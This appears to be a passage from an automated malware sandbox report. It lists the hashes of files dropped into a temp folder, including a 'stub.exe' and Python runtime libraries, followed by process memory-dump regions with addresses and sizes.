                                                                                                        MD5

                                                                                                        07bd9f1e651ad2409fd0b7d706be6071

                                                                                                        SHA1

                                                                                                        dfeb2221527474a681d6d8b16a5c378847c59d33

                                                                                                        SHA256

                                                                                                        5d78cd1365ea9ae4e95872576cfa4055342f1e80b06f3051cf91d564b6cd09f5

                                                                                                        SHA512

                                                                                                        def31d2df95cb7999ce1f55479b2ff7a3cb70e9fc4778fc50803f688448305454fbbf82b5a75032f182dff663a6d91d303ef72e3d2ca9f2a1b032956ec1a0e2a

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\onefile_5524_133638303265569419\python310.dll
                                                                                                        Filesize

                                                                                                        4.3MB

                                                                                                        MD5

                                                                                                        c80b5cb43e5fe7948c3562c1fff1254e

                                                                                                        SHA1

                                                                                                        f73cb1fb9445c96ecd56b984a1822e502e71ab9d

                                                                                                        SHA256

                                                                                                        058925e4bbfcb460a3c00ec824b8390583baef0c780a7c7ff01d43d9eec45f20

                                                                                                        SHA512

                                                                                                        faa97a9d5d2a0bf78123f19f8657c24921b907268938c26f79e1df6d667f7bee564259a3a11022e8629996406cda9fa00434bb2b1de3e10b9bddc59708dbad81

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\onefile_5524_133638303265569419\select.pyd
                                                                                                        Filesize

                                                                                                        28KB

                                                                                                        MD5

                                                                                                        adc412384b7e1254d11e62e451def8e9

                                                                                                        SHA1

                                                                                                        04e6dff4a65234406b9bc9d9f2dcfe8e30481829

                                                                                                        SHA256

                                                                                                        68b80009ab656ffe811d680585fac3d4f9c1b45f29d48c67ea2b3580ec4d86a1

                                                                                                        SHA512

                                                                                                        f250f1236882668b2686bd42e1c334c60da7abec3a208ebebdee84a74d7c4c6b1bc79eed7241bc7012e4ef70a6651a32aa00e32a83f402475b479633581e0b07

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\onefile_5524_133638303265569419\sqlite3.dll
                                                                                                        Filesize

                                                                                                        1.4MB

                                                                                                        MD5

                                                                                                        926dc90bd9faf4efe1700564aa2a1700

                                                                                                        SHA1

                                                                                                        763e5af4be07444395c2ab11550c70ee59284e6d

                                                                                                        SHA256

                                                                                                        50825ea8b431d86ec228d9fa6b643e2c70044c709f5d9471d779be63ff18bcd0

                                                                                                        SHA512

                                                                                                        a8703ff97243aa3bc877f71c0514b47677b48834a0f2fee54e203c0889a79ce37c648243dbfe2ee9e1573b3ca4d49c334e9bfe62541653125861a5398e2fe556

                                                                                                      • C:\Users\Admin\AppData\Local\Temp\onefile_5524_133638303265569419\stub.exe
                                                                                                        Filesize

                                                                                                        17.9MB

                                                                                                        MD5

                                                                                                        972d9d2422f1a71bed840709024302f8

                                                                                                        SHA1

                                                                                                        e52170710e3c413ae3cfa45fcdecf19db4aa382c

                                                                                                        SHA256

                                                                                                        1c666df4eafab03ecde809ffbc40dd60b8ac2fe7bdca5632c5c4002254e6e564

                                                                                                        SHA512

                                                                                                        3d84252756dcb4820b7794e9a92811d32631b9f3e9bd1a558fd040736b1472c0d00efb6ff7a13ae3bcd327f3bfac2b6ad94a5a3dfbc8ba54511a366c4f4727a6

                                                                                                      • \??\pipe\LOCAL\crashpad_4832_UUKYHGOCSHWAOXCP
                                                                                                        MD5

                                                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                                                        SHA1

                                                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                        SHA256

                                                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                        SHA512

                                                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                      • memory/1068-495-0x0000015B77180000-0x0000015B77192000-memory.dmp
                                                                                                        Filesize

                                                                                                        72KB

                                                                                                      • memory/1068-496-0x0000015B77160000-0x0000015B7716A000-memory.dmp
                                                                                                        Filesize

                                                                                                        40KB

                                                                                                      • memory/1092-427-0x00007FF6BAED0000-0x00007FF6BB506000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.2MB

                                                                                                      • memory/1092-480-0x00007FF6BAED0000-0x00007FF6BB506000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.2MB

                                                                                                      • memory/1632-238-0x0000000009530000-0x0000000009A5C000-memory.dmp
                                                                                                        Filesize

                                                                                                        5.2MB

                                                                                                      • memory/1632-237-0x0000000008E30000-0x0000000008FF2000-memory.dmp
                                                                                                        Filesize

                                                                                                        1.8MB

                                                                                                      • memory/1632-65-0x0000000000400000-0x0000000000450000-memory.dmp
                                                                                                        Filesize

                                                                                                        320KB

                                                                                                      • memory/1632-169-0x0000000008A10000-0x0000000008A60000-memory.dmp
                                                                                                        Filesize

                                                                                                        320KB

                                                                                                      • memory/3060-236-0x0000000006BE0000-0x0000000006BFE000-memory.dmp
                                                                                                        Filesize

                                                                                                        120KB

                                                                                                      • memory/3060-235-0x0000000009410000-0x0000000009486000-memory.dmp
                                                                                                        Filesize

                                                                                                        472KB

                                                                                                      • memory/3060-164-0x0000000000400000-0x0000000000470000-memory.dmp
                                                                                                        Filesize

                                                                                                        448KB

                                                                                                      • memory/4052-234-0x0000000000400000-0x000000000236A000-memory.dmp
                                                                                                        Filesize

                                                                                                        31.4MB

                                                                                                      • memory/4148-1-0x0000000077124000-0x0000000077126000-memory.dmp
                                                                                                        Filesize

                                                                                                        8KB

                                                                                                      • memory/4148-17-0x0000000000E80000-0x0000000001346000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4148-5-0x0000000000E80000-0x0000000001346000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4148-3-0x0000000000E80000-0x0000000001346000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4148-2-0x0000000000E81000-0x0000000000EAF000-memory.dmp
                                                                                                        Filesize

                                                                                                        184KB

                                                                                                      • memory/4148-0-0x0000000000E80000-0x0000000001346000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4568-602-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4568-603-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4724-139-0x0000025CF71F0000-0x0000025CF7212000-memory.dmp
                                                                                                        Filesize

                                                                                                        136KB

                                                                                                      • memory/4828-49-0x0000000005070000-0x00000000050BC000-memory.dmp
                                                                                                        Filesize

                                                                                                        304KB

                                                                                                      • memory/4828-42-0x0000000005300000-0x00000000058A4000-memory.dmp
                                                                                                        Filesize

                                                                                                        5.6MB

                                                                                                      • memory/4828-43-0x0000000004D50000-0x0000000004DE2000-memory.dmp
                                                                                                        Filesize

                                                                                                        584KB

                                                                                                      • memory/4828-168-0x00000000059B0000-0x0000000005A16000-memory.dmp
                                                                                                        Filesize

                                                                                                        408KB

                                                                                                      • memory/4828-46-0x0000000005100000-0x000000000520A000-memory.dmp
                                                                                                        Filesize

                                                                                                        1.0MB

                                                                                                      • memory/4828-41-0x00000000002C0000-0x0000000000310000-memory.dmp
                                                                                                        Filesize

                                                                                                        320KB

                                                                                                      • memory/4828-48-0x0000000005030000-0x000000000506C000-memory.dmp
                                                                                                        Filesize

                                                                                                        240KB

                                                                                                      • memory/4828-47-0x0000000004F90000-0x0000000004FA2000-memory.dmp
                                                                                                        Filesize

                                                                                                        72KB

                                                                                                      • memory/4828-44-0x0000000004D10000-0x0000000004D1A000-memory.dmp
                                                                                                        Filesize

                                                                                                        40KB

                                                                                                      • memory/4828-45-0x0000000005ED0000-0x00000000064E8000-memory.dmp
                                                                                                        Filesize

                                                                                                        6.1MB

                                                                                                      • memory/4828-40-0x0000000072D3E000-0x0000000072D3F000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/4916-591-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-21-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-657-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-654-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-653-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-371-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-462-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-649-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-369-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-648-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-647-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-481-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-18-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-623-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-239-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-614-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-271-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-601-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-20-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-19-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/4916-604-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/5216-383-0x00000000006F0000-0x0000000000F0E000-memory.dmp
                                                                                                        Filesize

                                                                                                        8.1MB

                                                                                                      • memory/5216-381-0x0000000000FE0000-0x0000000000FE1000-memory.dmp
                                                                                                        Filesize

                                                                                                        4KB

                                                                                                      • memory/5272-478-0x0000000000570000-0x00000000005C6000-memory.dmp
                                                                                                        Filesize

                                                                                                        344KB

                                                                                                      • memory/5272-479-0x0000000000570000-0x00000000005C6000-memory.dmp
                                                                                                        Filesize

                                                                                                        344KB

                                                                                                      • memory/5500-650-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/5500-652-0x0000000000B80000-0x0000000001046000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/5524-482-0x00007FF7BD780000-0x00007FF7BE255000-memory.dmp
                                                                                                        Filesize

                                                                                                        10.8MB

                                                                                                      • memory/5524-483-0x00007FF7BD780000-0x00007FF7BE255000-memory.dmp
                                                                                                        Filesize

                                                                                                        10.8MB

                                                                                                      • memory/5704-474-0x00007FF78BED0000-0x00007FF78D105000-memory.dmp
                                                                                                        Filesize

                                                                                                        18.2MB

                                                                                                      • memory/5760-447-0x0000000000670000-0x0000000000B36000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB

                                                                                                      • memory/5760-430-0x0000000000670000-0x0000000000B36000-memory.dmp
                                                                                                        Filesize

                                                                                                        4.8MB